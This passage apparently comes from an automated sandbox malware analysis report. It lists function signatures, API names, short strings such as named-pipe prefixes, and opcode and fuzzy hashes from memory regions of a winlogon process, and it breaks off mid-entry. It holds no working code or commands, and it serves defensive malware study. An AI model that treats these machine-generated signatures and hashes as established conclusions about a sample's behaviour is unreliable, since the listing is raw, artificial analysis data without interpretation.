• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
Memory Dump Source
• Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
Memory Dump Source
• Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction ID: 0ad3d618e1835294593f6452ab590f590bc81cd41d15a12307719c1f0daf2064
                                                              • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction Fuzzy Hash: C9D1AC7A208F9895DB70DB4AE49435A7BA0F7C8B89F104116EACD87BA9DF3CC551CB40
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: 2e98920b3895b546e8cfee93848436d20f1d91fbd890dc42e4983bef65e91d92
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 9131CE2A309F65A2EB52CFDEE54872A77A0FB44B86F18C1209F4A47B55EF34C4A1C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: 6d0a1707391fcb5c153528b149007a8a8c9fe1f40df049437015618af4cf0edf
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 5E31B23A781F61A2EA15CF9EE54876967A1FB48B86F18C0309F4C87B55EF34D4A1C300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: 4157702fcb9233f49a77c46e803b27685ba528657f510afb3a862d3f666b09f6
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: B3119D2874CE6071FE64ABFE954D32932426B95BB6F10C3A4A837477EADE78C441C200
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: 6f9918c3cbd4a8341a5960baa032c6c80083ab5fabd7ed8650c6535314c37da2
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: B9119D68300E6061FA68EBFE564D32922426F987B6F30C324A836C77EADE78C441C201
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: c75f4c628c11a50a5007a532dfe706c93d8ee4e04b1e1be502c9ae2a36d6589c
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: 0E016929314E5092EB60DB9AA84C35963A1F788BC6F988075DF8A43754DF3CC989C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: cb2a63c83e44a23da2db583fd32e9b754654e1e9db48b59022d394c89ab082b1
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: 99016929300E5092EB18DB9AA89C35963A6FB88BC6F988035DF4D83754DF3CC989C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: 5377c2d080006a4fe2cd119959f91c4f1597db279fc077c9b970d2bb0f292206
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: E101296D325F6492FB649BAAE80C71A73A0BB49B87F148464CE4A07765EF3DC158C704
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: 3adde3a003b7029c84831e13eabd217eaefc6f8cdf697e4629c9387f833a695b
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: FB012969211F60A2EB289BAAE91C71977A1BB59B87F188424CE4947764EF3DC148C704
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction ID: b166926d79cf74f009588074e3820990c0fc1e07a97fa4e01069ba2e3ee14553
                                                              • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction Fuzzy Hash: 6651BF3A75DA20EAEB14DF99E84CB5937AAF344B8AF10C5A4DA174778CDB35C842C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction ID: 599e737887705c3809ce4680662d838ae3905f4783b37dc68dc1ccc8eae22418
                                                              • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction Fuzzy Hash: 78519F3A701A20AAEB14DFA9E84CB5937A6F344BCAF30C524DA568778DDB75DD42C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: e535c0649dfb5c656df934673802aa2881829a80634b4f76755b7f08d64bed47
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: 69F04466718E51A2E7608BE9F9887596761F748BC9F94C020DB4A46654DF3CC68DCB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: 2a81db31a951e5e259a4acc7b5a595b85a3b479c602b75ed73f30d03813019d1
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: BBF06866304E51A2EB60CFE9F9C87597762F748B8AF94C020DB4946654DF3CC64DCB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: 05bf48fb40d5b317a8235632c964cef6d02a25c8f7691d3038dd68194b884147
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: 51F08C28328FA4A2FA448FDBB90C1196260AB48FD2F18E170EF4A07B58DF3CC485C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: 44bd982de87b7b9a06009664450f2777bab72fc188efb7fa02744482d7f49e87
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 72F09669329F14A1EB108FECE44C3596361EB89766F648259DB6A462F4CF3CC044C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: fb1c96070f1bbd8c52466b515c03c742fb3955bbc3562a61c2f5362b02f3ede6
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: 5BF05828204FA4A2EA588FDBB9081197262AB48FC2F08E030EF4A47B18DF38C445C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: 859cf1714d0438efb9fd229f799e05916821dabd80631214c70755d8405ab38f
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 21F09679311F15A1FB148BEDE84C3596361EB84767F548219CB6A452F4DF3CC444C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction ID: cc4e45ee1de0211bceb984575181e682b35c92b14fcfce5c930bbfc96d3dc94e
                                                              • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction Fuzzy Hash: EA02C836219F9496EB60CB99F49435AB7A0F3C5795F209015EB8E87BA9DF7CC444CB00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                              • Instruction ID: 8f9846ecf6cf7499faee6b5ce6658377365f055e4165f45403509503972279d5
                                                              • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                              • Instruction Fuzzy Hash: 6561CD3A51DF94D6E760CB99E44831AB7A0F3C8796F109165EA8E87BA8DB7CC544CF00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: 898a99a824d3708835f2c6571b9ade3bad5d2cda467ec0446c5c9970c4b06ed6
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: 6471F63A20CFA166E7269FED98483EA7794F389B86F648066DD0B53B89DE35C541C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: 5f5e41b068d0f293cc7ef7899fb07c4c471cec35d55f3e32321b6d3ba8d92876
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: 0971FB3A280FA166D726DFADD8483AA6794F385B86F648025DD0ED3B89DE35C645C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 1c103488b81b5755e9a858689f9c8f9220dbcbf2f2fcf3c8ea21b2028d61d58d
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: C5619D3B602F549AEB20CFA9D44439D7BA0F748B8EF148215EF4917B99DB38D156C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 9fd3008523d1d31d7ee32bda0e514125121f93270c61e4c83d0e3fe2aa1cbd72
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 4B61AB3B600F949AEB20DFA9D44439D77A0F748B8DF148A15EF4917B99DB38D496C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: 46897ffc2cc2630562e995aa3ab88a20c60a5fe9943d3a7bd5f75d2a5dc7dda7
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 8051273A60CFA1A1E6799FEDE05C37A7B51F784B41F648165CE4B03B49CA39C544C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: a83db0d25de40b44f666c5a5d64bcfc4ffcb5cd7079b315c16954b0aa5d8d6a1
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 0F516B3A284FA1A5F63ADFADE09C3BAA751F785B41F648125CE4D83B49CE39C544C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: ff598f2dff618ae855125180d135eff0feb50115b417593be16094bb43c2f728
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: BC41C476325E90A6DB21CFA9E8483AE77A0F798795F508021EE4E87794EB7CC445C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: 2b7cbdf29e740ea36268c330b496c3bcbbcaca586992bcfa57e7be5236719281
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: F0412A76314F90A2EB21DFA9E8483A977A1F398796F508021EE4D87794EF3CC445C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: 8e6f9ddc8bd4a0050d82363797f3a651ef4e3f91162d625b6a7f86f7e5c4113b
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: CF115B36218F9092EB608B59E40435977E4FB88B99F288260EF8D47B68DF3CC552CB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: c91e1e86bab824f286d7942031cacff95a827eda15b7eec0a60a9f277f66f1ea
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: 54112B3A218F9092EB65CB59E44435977E5FB88B99F688220EF8C47768DF3CC552CB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: 40d697394cd767119a46280874914b4daa5d8e9346db535fcc515f98333aa0ca
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction Fuzzy Hash: 7EE08661A41F84A0DF118F66E8442D873A0DB58B69B48D122995C46311FA38D1E9C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: 3bdf3a98a46eddaab18917913d4673d13906e839a3b4fd0dcf7fe39589f613a6
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction Fuzzy Hash: B2E08661640F84A0EF018F65E8442D833A0DB5CB65B49D122995C06351FA38D1E9C301
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
